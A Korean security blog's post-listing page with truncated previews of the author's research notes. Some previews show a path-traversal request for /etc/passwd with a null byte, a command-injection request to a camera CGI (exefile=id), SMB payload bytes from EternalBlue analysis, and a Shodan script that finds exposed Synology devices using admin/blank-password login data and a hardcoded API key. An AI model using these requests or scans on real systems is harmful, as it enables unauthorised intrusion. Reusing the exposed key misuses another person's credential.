목록분류 전체보기 (553)

Self-Improvement

Requests 모듈 시 Response의 html 값 중 var 등 특정 라인 추출하기(정규 표현식)

resp=s.post(url, data=data, timeout=2, verify=False) regex=re.compile('var session_id = \"[a-zA-Z0-9]+') ---> 영문+숫자 regex=re.compile("var AYECOM_FWVER=\"[^ \t\n\r\f\v]+") ---> 영문+숫자+특수문자 full_session=regex.search(resp.text).group() session_id=full_session.split("\"")[1] print session_id
개인/_개인 2020. 1. 10. 14:30
requests 모듈 request 할 시 Null (%00) 등 전송하는 법

request 패킷이 ../../../../../../../../../../../../../../../../etc/passwd%00index.htm 일시에 %00이 인코딩되어 %2500으로 넘어가게 됨으로 이때는 RAW 데이터형식으로 \x00으로 하여서 전송하면 %00으로 보내어진다. https://stackoverflow.com/questions/31254490/how-to-send-null-in-http-query-string How to send NULL in HTTP query string? I'm developing an API that can accept the main three data types as values to query string parameters: boolean, strin..
개인/_개인 2020. 1. 2. 16:14
shodan의 Synology NAS의 UPNP 제품명 알아오는 코드

import shodan import requests import subprocess import re from colorama import Fore from xml.etree import ElementTree as ET SHODAN_API_KEY = 'GKja8yvDZh5B1gDF6jhz64hTJkPtOCUV' count=0 query='synology port:1900' data=(('command','login'),('username','admin'),('password','')) def shodan_query(): try: api = shodan.Shodan(SHODAN_API_KEY) result = api.search(query, page=1) #You can modify the page ex..
프로그래밍/Python 2019. 12. 4. 11:04
제조사 라우터의 원래 펌웨어를 다운받는 곳( UART 계정을 알아낼때 유용)

https://download1.dd-wrt.com/dd-wrtv2/downloads/betas/ Index of /dd-wrtv2/downloads/betas/ download1.dd-wrt.com 참조 https://www.secsignal.org/en/news/exploiting-routers-just-another-tp-link-0day/
개인/_개인 2019. 12. 4. 11:03
python response - xml (xml.etree, ElementTree, ET)

보호되어 있는 글입니다.
개인/_개인 2019. 12. 2. 16:32
requests - MD5 digest auth(다이제스트 인증)

import requests from requests.auth import HTTPDigestAuth s = requests.Session() s.auth=HTTPDigestAuth('admin',before_pass) resp=s.get(url) # -*- coding: cp949 -*- # CVE : NCVE-2016-0045 # Description : # cgi-bin/supervisor/CloudSetup.cgi의 exefile 파라미터에서 관리자 권한으로 명령 실행이 가능한 Remote Code Execute가 발생하는 취약점 ''' ----REQUEST---- GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=id HTTP/1.1 ----RESPONSE---..
프로그래밍/Python 2019. 11. 25. 14:43
Socket 연습 1 (이터널블루 분석하던 중 작성)

개인적 Scapy와 비교할시에 Socket은 Syn-Syn/ack-ack을 기본으로 수행을해서 편하다. import socket # smb payload = '\x00\x00\x00T\xffSMBr\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/K\x00\x00\xc5^\x001\x00\x02LANMAN1.0\x00\x02LM1.2X002\x00\x02NT LANMAN 1.0\x00\x02NT LM 0.12\x00' payload2 = '\x00\x00\x00c\xffSMBs\x00\x00\x00\x00\x18\x01 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x..
프로그래밍/Python 2019. 10. 14. 17:45
ASUS 공유기 원격 업데이트 (2019-09-24)

보호되어 있는 글입니다.
프로그래밍/Python 2019. 9. 24. 09:16
IPTIME 기기 원격으로 업데이트 진행하는 코드작성 (2019-09-24)

보호되어 있는 글입니다.
프로그래밍/Python 2019. 9. 20. 15:29
HTTP 인증 기본 및 요약 이해(Basic, Digest 방식)

https://www.hackingarticles.in/hack-milnet-vm-ctf-challenge/ 불러오는 중입니다... HTTP 인증은 웹 서버 및 브라우저가 사용자 이름 및 비밀번호와 같은 신임 정보를 안전하게 교환하는 방법을 사용합니다. HTTP 인증 또는 HTTP 프로토콜을 통한 MD5 암호화 해싱 인코딩 기술 및 사전 정의 된 방법 / 표준을 따르는 다이제스트 인증으로 호출 할 수도 있습니다. 이 기사에서는 HTTP 인증에 사용되는 방법론 / 표준을 다룹니다. 이해를 돕기 위해 사용자 이름과 비밀번호를 캡처하는 php 스크립트를 사용하고 표준에 따라 Authorization 값을 생성합니다. http 코드를 보려면 여기를 방문 하십시오 Base 64 인코딩을 사용한 기본 액세스 인증 ..
개인/_개인 2019. 8. 26. 10:50
이전 Prev 1 ··· 23 24 25 26 27 28 29 ··· 56 Next 다음